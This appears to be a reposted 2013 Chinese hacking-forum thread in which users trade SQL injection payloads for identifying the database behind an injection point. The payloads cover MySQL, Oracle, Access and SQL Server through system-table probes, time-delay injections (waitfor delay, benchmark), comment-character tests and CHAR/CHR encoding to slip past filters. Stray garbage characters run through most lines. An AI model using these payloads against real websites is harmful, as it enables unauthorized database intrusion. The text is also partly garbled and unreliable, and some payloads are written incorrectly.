一个注射点如何最快速确认是什么类型数据库; d8 a, b& k% T6 E4 K7 Z( w
xsser (十根阳具有长短!!) | 2013-02-05 12:36/ h% B( A% u; X* F- i9 g3 ~3 i
假设这么一个注射点:7 `; G1 _- l6 B+ m4 \
show.html?id=2
. P' t- C7 ^# Hmysql:id=2 and version()>0& }; z% }# @$ L% F9 ~
oracle:id=2 and '1'||'1'='11
2 i( T, p5 y/ l6 l其他的欢迎补充 s# s$ Q! G& X$ B
1#
) V+ u3 G% M! fupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 12:47' _2 P% \4 O, H' o7 c7 W8 [1 x
Access:8 w, |; A: |# e9 h1 p* f$ j
aNd aSc(cHr(97))=97. T0 R( Y: O2 k& W; v2 e' I
and exists(select id from MSysAccessObjects)
: {; f. s) M O3 k8 F/ USQL Server:- }' L3 F+ e8 k6 f2 ~
and exists(select id from sysobjects)
4 ]; q/ [9 H0 d t% u5 Vand length(user)>0% f3 [) [( ]4 T! q' T
MySQL:
( T$ {& ?1 Q+ R0 r9 `and length(user())>08 y! w( }6 w$ g, k" G
2#( J4 M4 X7 I( e
xsser (十根阳具有长短!!) | 2013-02-05 12:48
7 [' P/ S$ `' X& ~. I9 F/ \$ n" q@upload 如果这些都不是呢…, i$ r7 F+ ^$ R) q
3#
2 |* a( f8 [. H- supload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:03
) B( ^$ R* s7 j$ D' D@xsser 不快速的,延时注入
) Y. w6 ^6 C% v1 v$ ]" A不知道这样写对不对
- c6 Y: W+ p) pmssql:id=2 and IF(ascii(SUBSTRING('name',1,1))>0)waitfor delay'0:00:3'
8 `# K& i5 o" Z. A1 y$ {+ k2 Q% Jmysql:id=2 and select benchmark(1e8,current_date());' J: V% n( [2 r( M. R
4#
7 D, P; a7 n* f# Oupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:10$ f. b" ? |) H
最快的貌似是看报错信息 m. H* k; U; D- m- H
oracle error2 W1 |3 S) {/ y I% c; l
mssql error v+ w$ I8 I0 |
mysql error& c7 G' I( }/ _
5#
5 ^# e, Q5 ]5 c) [6 z# e$ d$ M' o* k9 eNimda (你们都是坏银~) | 2013-02-05 13:14( d/ z" \. G* i, k$ b& ]- u1 D
小菜献丑来一发 Oracle:id=2 and 0<>(select count(*) from dual)
: Q: {; t" ?* `3 j4 X( H6 q9 C6## ]8 G, l, e. U7 }5 C
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:21
, l# @/ J6 q7 ?“/*”是MySQL中的注释符,返回错误说明该注入点不是MySQL,继续提交如下查询字符:/ [9 X+ W* ~ w( B3 b
“–”是Oracle和MSSQL支持的注释符,如果返回正常,则说明为这两种数据库类型之一。继续提交如下查询字符:. O$ }/ Y/ S* \$ q
“;”是子句查询标识符,Oracle不支持多行查询,因此如果返回错误,则说明很可能是Oracle数据库。& a0 ~1 ~0 D" `9 P2 B1 G
7#
. e3 | w6 F4 v p! O_Evil (HackEnd) | 2013-02-05 13:333 S, D# q4 v: }8 V2 \" j
PostgreSQL; h% m2 R9 |: _5 O& H$ ^2 f; E' K
8#
1 l& O) ^0 O+ t% E8 r' I: Dupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:425 M1 C& S5 c/ }- V+ ]! L& N
切换编码 and 1=1# h; G; n* D9 M" I5 Z9 P: v
oracle: C5 ^0 ^, }$ D1 p+ l \: o8 C
CHR(97) || CHR(110) || CHR(100) || CHR(32) || CHR(49) || CHR(61) || CHR(49)
" T- e4 v; V, F2 V! P$ Y. y0 nmssql:/ s2 u) ]6 Z8 r j% G9 }6 C- L. J
CHAR(97) + CHAR(110) + CHAR(100) + CHAR(32) + CHAR(49) + CHAR(61) + CHAR(49)2 r+ v7 b3 |4 V
mysql:
& X6 m) p5 y" H5 uCHAR(97, 110, 100, 32, 49, 61, 49)
/ U C; a; Y6 s+ M7 h9#8 ~" J5 Y1 \, H4 |' I* D6 y
xsser (十根阳具有长短!!) | 2013-02-05 14:31
9 N" t# q0 X6 |/ u% O9 N@upload 比较常见的数据库这些还是可以判断的,但是还有其他奇葩类型的呢?
: L- n4 O; k1 D. Q10#
}0 V2 E) q( \4 e# ] `& y# n7 vupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 14:468 O5 @* o5 K8 `, E) l
@xsser 是奇葩数据库类型的么?
1 `) {" G) J5 ~5 Z根据注入的原理,我们可以猜想,要成功的注入,必须使得注入后的一片和谐,那么使用该类数据库特性来判断,综上所述:
3 d! V" b: M* b+ R; m0 U1.是否可以使用特定的函数来判断,该数据库特有的
' |1 \5 Z" o0 i5 ]2.是否可以使用辅助的符号来判断,如注释符号、多语句查询符等等& f- K$ \$ {/ S2 J# J) W
3.是否可以编码查询& C# z' w1 \( G1 u5 M
4.是否显可以利用错信息
5 E# g8 |1 U2 \* ^% p5.是否存在数据库某些特性辅助判断
3 [1 \) E: \; G" w3 M' K个人见解- z1 ]( u9 y: v4 Z/ Y" `3 p
11#
! t4 ~6 x% f @0 W小胖子 (z7y壮士,来,干了这碗酒!) | 2013-02-05 14:55
" D5 r* k% C5 ?! Q( o7 c( n: F% P已收藏,mssql可以直接看到错误提示的吧~
! \; s$ x7 a, \& g( m12#7 y" A1 j6 K6 l8 }: b
Passer_by | 2013-02-05 15:09
/ h; f3 [. Z+ v) M) F7 [2 V曾被 @GaRY 面过我这题。。。紧张了。。后来回家sqlmap判断注射点的时候抓包看了下。。。一抓包全出来了居然。。
! m2 M" d1 |$ ^8 cfrom:http://zone.wooyun.org/content/260 |
发表于 2013-2-11 09:54:04
收藏
支持
反对